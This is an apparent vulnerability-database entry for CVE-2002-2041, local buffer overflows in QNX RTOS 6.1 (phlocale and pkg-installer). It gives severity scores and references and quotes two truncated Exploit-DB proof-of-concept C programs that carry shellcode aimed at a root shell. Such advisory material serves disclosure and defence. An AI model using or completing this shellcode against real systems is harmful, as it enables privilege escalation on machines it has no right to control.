CVE-2002-2041
Published 2002-12-31
Priority: P4 · 22 · high · 7.2 CVSS 2.0
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.24% (65.3th percentile)
Multiple buffer overflows in realtime operating system (RTOS) 6.1.0 allow local users to execute arbitrary code via (1) a long ABLANG environment variable in phlocale or (2) a long -u option to pkg-installer.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qnx | rtos | — | — |
No detection rules found.
Exploit-DB
QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow
exploitdb·2002-06-03
---
```c
/*
source: https://www.securityfocus.com/bid/4917/info
The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root.
*/
/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell.
 * If it doesn't work for you, then you most likely need to change
 * the address to system() and/or the ret.
 *
 * www.badc0ded.com
 */
main ()
{
    char s[]="\xeb\x0e\x31\xc0\x5b"
             "\x88\x43\x2\x53\xbb"
             "\x80\x95\x04\x08" //system() address
             "\xff\xd3\xe8\xed\xff"
             "\xff\xff\x73\x68";
    char payload[1000];
    memset (payload,0x90,sizeof(pay
```
Exploit-DB
QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow
exploitdb·2002-06-03
---
```c
/*
source: https://www.securityfocus.com/bid/4918/info
It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.
The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer.
*/
/* Quick and dirty QNX pkg-installer root exploit.
 * The shellcode sucks, it is longer than it has
 * to be and you need the address to system() for
 * it to work. Yes I know I'm lazy....
 *
 * http://www.badc0ded.com
 */
main(int argc, char **argv)
{
    int ret=0x804786d;
    char *pret;
    char s[]="\xeb\x0e\x31\xc0\x5b"
             "\x88\x43\x2\x53\xbb"
             "\xe4\xb4\x04\x08" //system() address
             "\xff\xd3\xe8\xed\xff"
             "\xff\xff\x73\x68";
    char payload[2000];
```
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/275218
http://www.iss.net/security_center/static/9258.php
http://www.iss.net/security_center/static/9259.php
http://www.securityfocus.com/bid/4917
http://www.securityfocus.com/bid/4918